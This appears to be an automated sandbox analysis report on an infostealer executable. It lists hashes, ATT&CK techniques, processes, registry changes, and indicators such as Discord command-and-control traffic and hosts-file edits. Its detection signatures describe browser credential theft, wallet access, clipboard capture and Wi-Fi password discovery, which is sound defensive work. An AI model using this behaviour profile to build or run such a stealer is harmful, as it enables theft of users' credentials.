a73bab6855e00d0624499d2254e92e737f6078ffe341608f5adc35795f10725c

Analysis

max time kernel
37s
max time network
38s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09/12/2024, 19:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Omega Gen By elfidelitop.exe
Size

5.9MB
MD5

2eefe54618a3a52010ae974e93f1ea1c
SHA1

473d3f680e2f8e9e0795cdeea7f9688993eb4021
SHA256

a73bab6855e00d0624499d2254e92e737f6078ffe341608f5adc35795f10725c
SHA512

c31fb2067ddeff6ecd4464a4e788889502a50b581fa053072354e1218fb84734f492ecd7b379ebf0e2a52eccea39234bdf3dd17d6e4125abc696e91e57cc05ff
SSDEEP

98304:VR+nh2Yi65sn6Wfz7pnxCjJaWlpx1dstaNoSwKHf1c3z5MOueAeFF9hakrJ/U6V/:VsnLDOYjJlpZstQoS9Hf12VKXqbaCxV/

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4544	powershell.exe
1560	powershell.exe
1376	powershell.exe
2332	powershell.exe
4100	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Omega Gen By elfidelitop.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1512	cmd.exe
2824	powershell.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 1 IoCs

pid	Process
2964	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe
4440	Omega Gen By elfidelitop.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDrive.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4956	tasklist.exe
3668	tasklist.exe
3804	tasklist.exe
876	tasklist.exe
4484	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2436	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aaa3-21.dat	upx
behavioral1/memory/4440-25-0x00007FF980250000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/files/0x001900000002aa96-27.dat	upx
behavioral1/memory/4440-30-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp	upx
behavioral1/files/0x001900000002aaa1-29.dat	upx
behavioral1/files/0x001900000002aaa2-35.dat	upx
behavioral1/files/0x001900000002aaa0-34.dat	upx
behavioral1/memory/4440-32-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp	upx
behavioral1/files/0x001900000002aa98-43.dat	upx
behavioral1/files/0x004600000002aa9c-47.dat	upx
behavioral1/files/0x001900000002aa9d-48.dat	upx
behavioral1/files/0x001900000002aa9b-46.dat	upx
behavioral1/files/0x001900000002aa9a-45.dat	upx
behavioral1/files/0x001900000002aa99-44.dat	upx
behavioral1/files/0x001b00000002aa95-41.dat	upx
behavioral1/files/0x001900000002aaa8-40.dat	upx
behavioral1/files/0x001900000002aaa7-39.dat	upx
behavioral1/files/0x001900000002aaa6-38.dat	upx
behavioral1/files/0x001900000002aa97-42.dat	upx
behavioral1/memory/4440-54-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp	upx
behavioral1/memory/4440-56-0x00007FF985A50000-0x00007FF985A68000-memory.dmp	upx
behavioral1/memory/4440-58-0x00007FF985990000-0x00007FF9859AE000-memory.dmp	upx
behavioral1/memory/4440-60-0x00007FF980910000-0x00007FF980A81000-memory.dmp	upx
behavioral1/memory/4440-62-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp	upx
behavioral1/memory/4440-64-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp	upx
behavioral1/memory/4440-66-0x00007FF984310000-0x00007FF98433E000-memory.dmp	upx
behavioral1/memory/4440-71-0x00007FF984250000-0x00007FF984307000-memory.dmp	upx
behavioral1/memory/4440-74-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp	upx
behavioral1/memory/4440-79-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp	upx
behavioral1/memory/4440-81-0x00007FF97FDB0000-0x00007FF97FEC8000-memory.dmp	upx
behavioral1/memory/4440-78-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp	upx
behavioral1/memory/4440-77-0x00007FF980D90000-0x00007FF980DA5000-memory.dmp	upx
behavioral1/memory/4440-73-0x00007FF97FED0000-0x00007FF980247000-memory.dmp	upx
behavioral1/memory/4440-70-0x00007FF980250000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4440-105-0x00007FF985990000-0x00007FF9859AE000-memory.dmp	upx
behavioral1/memory/4440-117-0x00007FF980910000-0x00007FF980A81000-memory.dmp	upx
behavioral1/memory/4440-175-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp	upx
behavioral1/memory/4440-255-0x00007FF984310000-0x00007FF98433E000-memory.dmp	upx
behavioral1/memory/4440-256-0x00007FF984250000-0x00007FF984307000-memory.dmp	upx
behavioral1/memory/4440-282-0x00007FF97FED0000-0x00007FF980247000-memory.dmp	upx
behavioral1/memory/4440-298-0x00007FF985990000-0x00007FF9859AE000-memory.dmp	upx
behavioral1/memory/4440-293-0x00007FF980250000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4440-294-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp	upx
behavioral1/memory/4440-299-0x00007FF980910000-0x00007FF980A81000-memory.dmp	upx
behavioral1/memory/4440-308-0x00007FF980250000-0x00007FF9806B5000-memory.dmp	upx
behavioral1/memory/4440-318-0x00007FF984250000-0x00007FF984307000-memory.dmp	upx
behavioral1/memory/4440-323-0x00007FF97FED0000-0x00007FF980247000-memory.dmp	upx
behavioral1/memory/4440-334-0x00007FF980D90000-0x00007FF980DA5000-memory.dmp	upx
behavioral1/memory/4440-333-0x00007FF984B70000-0x00007FF984B7D000-memory.dmp	upx
behavioral1/memory/4440-332-0x00007FF984310000-0x00007FF98433E000-memory.dmp	upx
behavioral1/memory/4440-331-0x00007FF98A050000-0x00007FF98A05D000-memory.dmp	upx
behavioral1/memory/4440-330-0x00007FF984AF0000-0x00007FF984B09000-memory.dmp	upx
behavioral1/memory/4440-329-0x00007FF980910000-0x00007FF980A81000-memory.dmp	upx
behavioral1/memory/4440-328-0x00007FF985990000-0x00007FF9859AE000-memory.dmp	upx
behavioral1/memory/4440-327-0x00007FF985A50000-0x00007FF985A68000-memory.dmp	upx
behavioral1/memory/4440-326-0x00007FF984B80000-0x00007FF984BAC000-memory.dmp	upx
behavioral1/memory/4440-325-0x00007FF98A090000-0x00007FF98A09F000-memory.dmp	upx
behavioral1/memory/4440-324-0x00007FF989FF0000-0x00007FF98A014000-memory.dmp	upx
behavioral1/memory/4440-322-0x00007FF97FDB0000-0x00007FF97FEC8000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OneDrive.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
780	cmd.exe
4976	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4624	cmd.exe
3912	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	OneDrive.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	OneDrive.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3204	WMIC.exe
2524	WMIC.exe
3592	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2916	systeminfo.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDrive.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDrive.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ = "IFileInformationProvider"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{2387C6BD-9A36-41A2-88ED-FF731E529384}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\ = "FileSyncCustomStatesProvider Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{049FED7E-C3EA-4B66-9D92-10E8085D60FB}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}\InprocServer32\ThreadingModel = "Apartment"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\ = "ErrorOverlayHandler2 Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\odopen\URL Protocol	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{fac14b75-7862-4ceb-be41-f53945a61c17}\ = "IToastNotificationEvent"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\SyncEngineStorageProviderHandlerProxy.SyncEngineStorageProviderHandlerProxy.1\ = "SyncEngineStorageProviderHandlerProxy Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\ = "ISyncEngineCOMServer"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\SyncEngineFileInfoProvider.SyncEngineFileInfoProvider\ = "SyncEngineFileInfoProvider Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ = "IFileUploadCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2}\TypeLib\Version = "1.0"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FileSyncClient.FileSyncClient\CurVer\ = "FileSyncClient.FileSyncClient.1"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{A926714B-7BFC-4D08-A035-80021395FFA8}\VersionIndependentProgID	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\VersionIndependentProgID	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\18.151.0729.0013\\FileCoAuthLib.dll"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\TypeLib	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\VersionIndependentProgID\ = "BannerNotificationHandler.BannerNotificationHandler"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}\ = "IGetSelectiveSyncInformationCallback"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{9489FEB2-1925-4D01-B788-6D912C70F7F2}\TypeLib\ = "{638805C3-4BA3-4AC8-8AAC-71A0BA2BC284}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\FileSyncClient.AutoPlayHandler\shell\import\DropTarget\CLSID = "{5999E1EE-711E-48D2-9884-851A709F543D}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{389510b7-9e58-40d7-98bf-60b911cb0ea9}\VersionIndependentProgID	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\ProxyStubClsid32	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\ = "FileSyncEx"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\OOBERequestHandler.OOBERequestHandler.1\CLSID	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\VersionIndependentProgID\ = "SyncEngineCOMServer.SyncEngineCOMServer"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib\Version = "1.0"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\ProgID\ = "SyncEngineCOMServer.SyncEngineCOMServer.1"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\ = "ErrorOverlayHandler2 Class"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{EA23A664-A558-4548-A8FE-A6B94D37C3CF}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\CLSID\{C5FF006E-2AE9-408C-B85B-2DFDD5449D9C}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ = "IFileSyncClient"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{0f872661-c863-47a4-863f-c065c182858a}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{e9de26a1-51b2-47b4-b1bf-c87059cc02a7}\ = "IFileSyncClient6"	OneDrive.exe
Key created	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\WOW6432Node\Interface\{0776ae27-5ab9-4e18-9063-1836da63117a}	OneDrive.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OneDrive.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4976	PING.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3556	OneDrive.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4544	powershell.exe
2332	powershell.exe
4544	powershell.exe
2332	powershell.exe
4100	powershell.exe
4100	powershell.exe
2824	powershell.exe
2824	powershell.exe
2824	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
1560	powershell.exe
1560	powershell.exe
4768	powershell.exe
4768	powershell.exe
1376	powershell.exe
1376	powershell.exe
1568	powershell.exe
1568	powershell.exe
3556	OneDrive.exe
3556	OneDrive.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4544	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	4956	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: 36	2788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2788	WMIC.exe
Token: SeSecurityPrivilege	2788	WMIC.exe
Token: SeTakeOwnershipPrivilege	2788	WMIC.exe
Token: SeLoadDriverPrivilege	2788	WMIC.exe
Token: SeSystemProfilePrivilege	2788	WMIC.exe
Token: SeSystemtimePrivilege	2788	WMIC.exe
Token: SeProfSingleProcessPrivilege	2788	WMIC.exe
Token: SeIncBasePriorityPrivilege	2788	WMIC.exe
Token: SeCreatePagefilePrivilege	2788	WMIC.exe
Token: SeBackupPrivilege	2788	WMIC.exe
Token: SeRestorePrivilege	2788	WMIC.exe
Token: SeShutdownPrivilege	2788	WMIC.exe
Token: SeDebugPrivilege	2788	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2788	WMIC.exe
Token: SeRemoteShutdownPrivilege	2788	WMIC.exe
Token: SeUndockPrivilege	2788	WMIC.exe
Token: SeManageVolumePrivilege	2788	WMIC.exe
Token: 33	2788	WMIC.exe
Token: 34	2788	WMIC.exe
Token: 35	2788	WMIC.exe
Token: 36	2788	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2524	WMIC.exe
Token: SeSecurityPrivilege	2524	WMIC.exe
Token: SeTakeOwnershipPrivilege	2524	WMIC.exe
Token: SeLoadDriverPrivilege	2524	WMIC.exe
